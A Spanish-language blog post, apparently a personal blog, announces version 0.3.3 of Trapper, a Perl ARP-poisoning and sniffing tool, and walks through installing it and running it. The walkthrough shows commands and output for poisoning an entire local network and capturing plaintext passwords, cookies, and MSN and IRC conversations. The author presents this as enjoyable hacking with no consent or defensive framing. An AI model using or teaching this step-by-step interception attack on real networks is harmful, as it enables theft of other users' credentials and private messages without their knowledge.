Tutorial de Trapper

Trapper 0.3.3
Bueno estos chicos trabajan rapido Y acaban de sacar otra version de trapper
Cosas nuevas:
– Dirección MAC falsa (00:11:22:33:44:55 o aleatoria)
– Trapper.conf (para especificar parametros que se deseen sniffear via http, similar a la funcionalidad de Cain; además también se puede especificar los puertos que se deseen sniffear)
– IRC chat sniffing
Bugs arreglados:
– Detección de la dirección IP local
– Información duplicada en el HTTP sniffing
– Install.pl, algunos módulos faltantes
Lo pueden descargar de aquí.
http://nediam.com.mx/trapper/trapper-0.3.3.tar.gz</a></div>

Bueno les habia prometido un tutorial de uso de esta herramienta.
y Aqui vamos
tar -zxvf trapper-0.3.3.tar.gz
cd trapper-0.3.3/
Instala manualmente Net::Pcap de search.cpan.org y luego
perl install.pl
Esperamos a que se instalen los Modulos de perl
Ahora
#perl trapper.pl
–trapper ver. 0.3.3–
–Sniffer and ARP Poisoning Routing program–
Usage: trapper -i <interface> -m <mode> [-v msn,cookiem,irc] [-f fake_mac || random ]
Mode: sniff | apr
Example: trapper -i eth0 -m apr -f 00:02:5C:17:2B:FA
Si notan existen 2 modos el modo sniff y apr
Para poder sniffear toda la red tendremos que lanzar un ataque apr(arp).
de la siguiente forma.
Deberia llevar -f y la fakemac pero en algunas distros causa un problema asi que por ahora
no la pondremos.
#perl trapper.pl -i eth1 -m apr
——————————————————————-</div>

trapper ver. 0.3.2
Authors: crypkey, nediam, nahual
[*] MODE SELECTED: ARP POISON ROUTING
[*] Specify the range to scan (ex. 192.168.1.0192.168.1.254 )
Aqui especificaremos el rango de ips que queremos sniffear Podria ser toda la red local.
[*] Scanning range from 192.168.1.0 to 192.168.1.254…
[*] Skipping our host (IP attacker): 192.168.1.118
IP: 192.168.1.1 MAC: 00:0f:66:da:ab:89
IP: 192.168.1.100 MAC: 00:14:51:82:de:97
[*] Hosts found: 2
[*] Select Option:
[*] 1) One-to-One: Hijack the traffic only between two particular hosts
[*] 2) One-to-All: Hijack the network faking a single host (The default gateway is a good option)
[*] 3) Hijack the entire network
Ahora que tipo de ataque realizaremos , el mas bonito es el 3 . para que esniffe todo el tradico
de las maquinas que se encuentran dentro de la red local.
Type of attack: 3
[*] Infecting Host(s)…
[*] Leaving arp-poison into background: pid 6340 …
[*] Sniffing using Dev :eth1:
..Bueno y Ahora que ?
Si hay trafico empezaran a salir contraseñas en texto plano
Por default snifea los protocolos
1. HTTP (Cookie supported)
2. FTP
3. TELNET
4. POP3
5. IMAP
6. SMTP
7. MSN
8. IRC (Convos supported)
9. SMB
Que es lo mismo que seleccionaramos esta opcion
##perl trapper.pl -i eth1 -m sniff
——————————————————————-</div>

trapper ver. 0.3.2
Authors: crypkey, nediam, nahual
[*] MODE SELECT: SNIFFER
[*] Supported protocols:
1. HTTP (Cookie supported)
2. FTP
3. TELNET
4. POP3
5. IMAP
6. SMTP
7. MSN
8. IRC (Convos supported)
9. SMB
10. All
Pues de una vez todo no? mas vale que sobre y no que falte.
Select option(s) [default: 10]: 10
[*] Sniffing using Dev :eth1:
[*] Filter :tcp and port 21 or port 23 or port 25 or port 80 or port 143 or port 110 or port 1863 or port 6667 or port 445:
MSG: VERSION
User: test
Pass: test
Host: hi5.com
User/Pass: [email protected]&password=test&remember=on
Host: hi5.com
User/Pass: status=1:1:1&fromInterstitial=true&circle=17851952&status-0=1&userid=144997706&circle=17851952&status-1=1&userid=6619911&circle=17851952&status-2=1&userid=9180542</div>

Bueno que les parece?
para el irc crea un directorio donde guarda las conversaciones tanto privadas como de algun canal.
para el msn igual crea un directorio por cada conversacion que se tienen el messenger.
para pop3/ftp crea un arhicvo llamado ftp-pop3.txt
Dudas, Comentarios?
Happy Hacking Guys

</span>

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos necesarios están marcados *

This site uses Akismet to reduce spam. Learn how your comment data is processed.